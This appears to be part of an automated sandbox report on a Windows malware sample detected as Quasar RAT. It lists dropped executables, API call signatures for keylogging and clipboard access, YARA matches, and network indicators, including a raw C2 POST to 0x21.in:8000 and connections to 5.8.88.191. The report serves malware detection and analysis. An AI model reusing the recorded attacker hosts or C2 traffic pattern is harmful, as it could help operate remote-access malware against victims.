Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00AA445A

Networking:

Uses known network protocols on non-standard ports

Show sources

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

May check the online IP address of the machine

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: POST /_az/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 0x21.in:8000Content-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: global traffic	TCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000
Source: global traffic	TCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080

Source: CVbJSUXraQ.exe, 00000007.00000002.943097496.0000000003320000.00000004.00000001.sdmp	String found in binary or memory: http://0x21.in:8000/_az/
Source: windef.exe	String found in binary or memory: http://api.ipify.org/
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/3
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://freegeoip.net/xml/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com40l
Source: windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp	String found in binary or memory: https://dotbit.me/a/

Source: unknown

DNS traffic detected: queries for: 0x21.in

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C6B070 socket,connect,setsockopt,send,recv,shutdown,closesocket,HeapFree,

5_2_00C6B070

Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191
Source: unknown	TCP traffic detected without corresponding DNS query: 5.8.88.191

Source: unknown

HTTP traffic detected: POST /_az/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 0x21.in:8000Content-Length: 101Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

1_2_00DB2344

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

5_2_00C83CC0

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C83A94 GetWindowLongPtrA,SendNotifyMessageA,GetClipboardOwner,OpenClipboard,GetClipboardData,GlobalLock,lstrlenA,lstrlenA,HeapAlloc,lstrlenA,lstrlenA,HeapFree,GlobalUnlock,CloseClipboard,SendNotifyMessageA,SetWindowLongPtrA,DefWindowProcA,

5_2_00C83A94

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	1_2_00E3CABC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	7_2_00E3CABC
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00ACCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	10_2_00ACCABC

E-Banking Fraud:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
